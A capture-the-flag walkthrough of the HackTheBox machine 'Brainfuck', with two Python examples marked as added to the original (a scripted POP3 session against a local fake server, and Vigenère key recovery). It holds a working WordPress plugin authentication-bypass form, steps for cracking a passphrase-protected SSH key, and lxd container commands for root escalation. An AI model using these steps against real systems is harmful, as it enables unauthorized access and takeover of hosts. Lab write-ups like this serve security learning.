# BrainFuck

## Gaining Access

Nmap scan:

<figure><img src="/files/42eCJiDCswucR2Bdpdux" alt=""><figcaption></figcaption></figure>

We can add `brainfuck.htb` to our `/etc/hosts` file and visit the HTTP websites.

### WordPress Ticket System

The website is a WordPress site:

<figure><img src="/files/O6FSUzpcjlnG1QG3gqDk" alt=""><figcaption></figcaption></figure>

Because this is an HTTPS website, we can look at the TLS certificate first; the subject and alternative names often leak an email address and extra hostnames.

<figure><img src="/files/JZ3Q5aw6dQBxiZoXZrw8" alt=""><figcaption></figcaption></figure>

Looking at the Subject Alternative Names, we can find another hidden subdomain, which we'll visit later.

<figure><img src="/files/doXyvqJXsZBPjpTmeiwE" alt=""><figcaption></figcaption></figure>

We can run `wpscan --enumerate p,t,u` against this website to enumerate plugins, themes and users. This returns a plugin that is outdated and has public exploits.

<figure><img src="/files/eZzgtdU5OnBl6uhVrtoM" alt=""><figcaption></figcaption></figure>

For this version, there are SQL Injection and Privilege Escalation exploits available.

<figure><img src="/files/3xj84H4MhulpbmjzIkxS" alt=""><figcaption></figcaption></figure>

Based on the PoC for the Privilege Escalation one, we have to craft an HTML form that posts to `admin-ajax.php` with the plugin's `loginGuestFacebook` action; the vulnerable action logs us in as whatever `username` we post, without ever checking a password. It also wants an email address, and earlier we found one for the user `orestis` in the certificate, so we can use that.

Here's the HTML form we need:

```markup
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="orestis@brainfuck.htb">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>
```

Afterwards, we just need to host this on a Python web server (`python3 -m http.server`), open it in the browser and submit the form. The `admin` username comes from the author of the first post we saw on the site.

<figure><img src="/files/CmKsh6wM1eaLatzSF5QM" alt=""><figcaption></figcaption></figure>

Initially, nothing visibly happens when we click the login button, because the response only sets the WordPress authentication cookie. After refreshing the page, however, we are notified that we are logged in as the administrator.

<figure><img src="/files/srAguemvagmE1IWC7dh8" alt=""><figcaption></figcaption></figure>

### SMTP Creds

When viewing the installed plugins, we can find another plugin that lets WordPress send mail through an external SMTP server.

<figure><img src="/files/UqmKQJfDgmikLdz1qzm5" alt=""><figcaption></figcaption></figure>

The SMTP configuration page stores a mail account's username and password. These are the credentials for the mail server, and the same account also works against the POP3 service that nmap found on port 110.

<figure><img src="/files/dZaj5D3yJZXQu2Eehe6f" alt=""><figcaption></figcaption></figure>

The password field is masked in the browser, but the value is still in the HTML, so it can be read from the page source.

<figure><img src="/files/YlUkSsaFST2x6A9pXXND" alt=""><figcaption></figcaption></figure>

We can then use these credentials to read the mailbox over POP3.

### Reading Emails

We can sign in to the POP3 service on port 110 with the `USER` and `PASS` commands.

<figure><img src="/files/NrWR9HQcz9ZbJSKIl783" alt=""><figcaption></figcaption></figure>

Then, we can list the messages in the mailbox with `LIST` and read each one with `RETR <number>`.

<figure><img src="/files/IGwNrpJo6UJw3rhEfbmt" alt=""><figcaption></figcaption></figure>

There are two emails, and one of them contains credentials for a forum page.

<figure><img src="/files/1kXtGYoArUEgI5Kej8JR" alt=""><figcaption></figcaption></figure>

These are probably credentials for the secret subdomain we found earlier.
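The manual `USER` / `PASS` / `LIST` / `RETR` session above, scripted with Python's standard `poplib`. This is an added example, not part of the original writeup: it ships with a constructed in-process POP3 server (`FakePOP3Handler`) so it runs offline, and the mailbox contents, the `orestis` password and the "login is user / password" wording are all assumptions for the demo, not the box's real values. Against the real target you would point `fetch_messages` at `brainfuck.htb`, port 110, with the credentials from the SMTP plugin.

```python
import poplib
import socketserver
import threading

# Constructed demo mailbox: two messages, the second carrying forum credentials.
# (The real box's messages and passwords are not reproduced here.)
MAILBOX = [
    "From: root@example.htb\r\nTo: orestis@example.htb\r\nSubject: test\r\n\r\n"
    "Just testing mail delivery.\r\n",
    "From: admin@example.htb\r\nTo: orestis@example.htb\r\nSubject: forum access\r\n\r\n"
    "Your forum login is demo / Sup3rS3cret!\r\n",
]
VALID_USER, VALID_PASS = "orestis", "example-password"  # assumed demo credentials


class FakePOP3Handler(socketserver.StreamRequestHandler):
    """Minimal POP3 server (RFC 1939 subset) so the client side below runs offline."""

    def send(self, line):
        self.wfile.write((line + "\r\n").encode())

    def handle(self):
        user, authed = None, False
        self.send("+OK POP3 ready")
        while True:
            raw = self.rfile.readline()
            if not raw:  # client disconnected
                return
            cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.send("+OK")
            elif cmd == "PASS":
                authed = user == VALID_USER and arg == VALID_PASS
                self.send("+OK Logged in." if authed else "-ERR [AUTH] Authentication failed.")
            elif cmd == "QUIT":
                self.send("+OK Bye")
                return
            elif not authed:
                self.send("-ERR Authenticate first")
            elif cmd == "LIST":
                self.send(f"+OK {len(MAILBOX)} messages:")
                for i, m in enumerate(MAILBOX, 1):
                    self.send(f"{i} {len(m)}")
                self.send(".")  # end of multi-line response
            elif cmd == "RETR":
                if not arg.isdigit() or not 1 <= int(arg) <= len(MAILBOX):
                    self.send("-ERR no such message")
                    continue
                msg = MAILBOX[int(arg) - 1]
                self.send(f"+OK {len(msg)} octets")
                for line in msg.split("\r\n"):
                    # byte-stuffing: a body line that begins with "." is sent as ".."
                    self.send("." + line if line.startswith(".") else line)
                self.send(".")
            else:
                self.send("-ERR unknown command")


def start_server():
    """Serve the fake mailbox on an ephemeral localhost port; returns (port, server)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePOP3Handler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1], srv


def fetch_messages(host, port, user, password):
    """USER / PASS / LIST / RETR, exactly as typed by hand in the writeup.
    Returns every message as text, or None if the server rejects the login."""
    conn = poplib.POP3(host, port, timeout=5)
    try:
        conn.user(user)
        try:
            conn.pass_(password)
        except poplib.error_proto:  # server answered "-ERR ..." to PASS
            return None
        _, listing, _ = conn.list()  # entries look like b"1 93"
        messages = []
        for entry in listing:
            num = int(entry.split()[0])
            _, lines, _ = conn.retr(num)  # poplib un-stuffs leading dots for us
            messages.append(b"\r\n".join(lines).decode())
        return messages
    finally:
        conn.quit()


def find_credentials(messages, marker="login is"):
    """Pick 'user / password' out of the first line containing the marker."""
    for msg in messages:
        for line in msg.splitlines():
            if marker in line:
                creds = line.split(marker, 1)[1]
                user, _, password = (part.strip() for part in creds.partition("/"))
                return user, password
    return None
```

POP3 sends the password in clear text, which is why grabbing it from the SMTP plugin and replaying it here works unchanged; the `-ERR [AUTH]` branch is what you see when the SMTP account and the POP3 account are not the same.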

### Forum Page

We can log in to the forum on the hidden subdomain using the credentials from the email. Then, we can view the threads that are present.

<figure><img src="/files/Nd2Him8F4xfhyAnBXuDQ" alt=""><figcaption></figcaption></figure>

Some of the forum threads mention that an SSH key is going to be handed over somehow.

<figure><img src="/files/vQwjZX2yaPiGezMsPwrJ" alt=""><figcaption></figcaption></figure>

There were also a few encrypted posts.

<figure><img src="/files/ZDarC5hWiQsBGMNTHIFZ" alt=""><figcaption></figcaption></figure>

There is clearly a URL in there, and the digits **are not being scrambled**, so whatever cipher this is only transforms letters and passes everything else through. That structure (`https://`, the slashes, the `.htb` domain) also gives us known plaintext to line up against the ciphertext. After a bit of research and testing in CyberChef, it turns out to be a Vigenère cipher.

<figure><img src="/files/wCKKKQk1Q2tF4aMhaMP2" alt=""><figcaption></figcaption></figure>
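A Vigenère implementation that behaves the way the forum post did (letters shifted, digits and punctuation untouched), together with the known-plaintext step that CyberChef trial-and-error is doing under the hood: subtracting a crib such as `https://example.htb` from the ciphertext at the same offset yields the repeating key. This is an added example, not code from the writeup, and the key `lemon`, the URL and the message text are constructed for the demo; the real post and key are only in the screenshot above.

```python
import string

ALPHABET = string.ascii_lowercase


def vigenere(text, key, decrypt=False):
    """Vigenère over letters only. Digits, punctuation and whitespace pass through
    unchanged and do not advance the key, which is why the digits in the post
    survived intact. Case is preserved."""
    shifts = [ALPHABET.index(k) for k in key.lower() if k in ALPHABET]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out, ki = [], 0
    for ch in text:
        low = ch.lower()
        if low not in ALPHABET:
            out.append(ch)
            continue
        shift = -shifts[ki % len(shifts)] if decrypt else shifts[ki % len(shifts)]
        new = ALPHABET[(ALPHABET.index(low) + shift) % 26]
        out.append(new.upper() if ch.isupper() else new)
        ki += 1
    return "".join(out)


def shortest_period(stream):
    """Collapse a repeated keystream to its shortest repeating unit.
    (Keys that are themselves periodic, e.g. 'abab', collapse further; fine here.)"""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key(ciphertext, crib, position):
    """Known-plaintext attack: `crib` is plaintext known to sit at index `position`
    of the ciphertext. Each letter pair gives key = cipher - plain (mod 26).
    Letters before the crib shift the key's phase, so the result is rotated back
    so that key[0] is the letter applied to the first letter of the text.
    The crib must contain at least as many letters as the key."""
    letters_before = sum(1 for ch in ciphertext[:position] if ch.lower() in ALPHABET)
    stream = []
    for c, p in zip(ciphertext[position:], crib):
        c_l, p_l = c.lower(), p.lower()
        if (c_l in ALPHABET) != (p_l in ALPHABET):
            raise ValueError("crib is misaligned with the ciphertext")
        if c_l in ALPHABET:
            stream.append(ALPHABET[(ALPHABET.index(c_l) - ALPHABET.index(p_l)) % 26])
    period = shortest_period("".join(stream))
    r = letters_before % len(period)
    return period[len(period) - r:] + period[:len(period) - r]


# Constructed demo values (hypothetical key and URL, not the ones from the box).
KEY = "lemon"
PLAINTEXT = "the key lives at https://example.htb/files/1234/id_rsa until friday"
CIPHERTEXT = vigenere(PLAINTEXT, KEY)
```

Usage: `recover_key(CIPHERTEXT, "https://example.htb", PLAINTEXT.index("https://"))` returns `"lemon"`, and `vigenere(CIPHERTEXT, "lemon", decrypt=True)` gives back the URL. The crib position is the same in plaintext and ciphertext precisely because non-letters are never moved, which is the tell the digits gave away.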

Then, we can head to the decrypted URL to find the `id_rsa` file for `orestis`.

<figure><img src="/files/8Rmm2Ti4yE9gQYcDtixN" alt=""><figcaption></figcaption></figure>

The key is passphrase-protected, so we have to use `ssh2john.py` to convert it into a hash that `john` can crack.

<figure><img src="/files/objc69ueAa9cfWbe73qQ" alt=""><figcaption></figcaption></figure>

With the passphrase recovered, we can use `openssl rsa` to write out an unencrypted copy of the key (remember to `chmod 600` it, or SSH will refuse to use it).

<figure><img src="/files/grXGpeMbHD4AdxG4jqbk" alt=""><figcaption></figcaption></figure>

Afterwards, we can simply SSH in as `orestis` using this key.

<figure><img src="/files/M6tcMNX76aFOG6Al0MYn" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### lxd

When enumerating with LinPEAS, we can see that the user is a member of the `lxd` group.

<figure><img src="/files/1jLsORzGyeaUhf81bnJ0" alt=""><figcaption></figcaption></figure>

Members of this group can create and manage containers through the lxd daemon, which runs as root. The escalation path is to launch a privileged container with the host's root filesystem mounted inside it: root inside that container can then read and write every file on the host.

{% embed url="<https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation>" %}

I downloaded an Alpine distro to the machine. Then, we can execute the commands from HackTricks:

```bash
# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.

# before running the image, start and configure the lxd storage pool as default 
lxd init

# run the image
lxc init myimage mycontainer -c security.privileged=true

# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
```

The last command drops us into a root shell inside the container, where the host's filesystem is visible under `/mnt/root`, so the root flag can be read from `/mnt/root/root/`.

<figure><img src="/files/Ma1IWJPkZqt9LNCvqr1O" alt=""><figcaption></figcaption></figure>
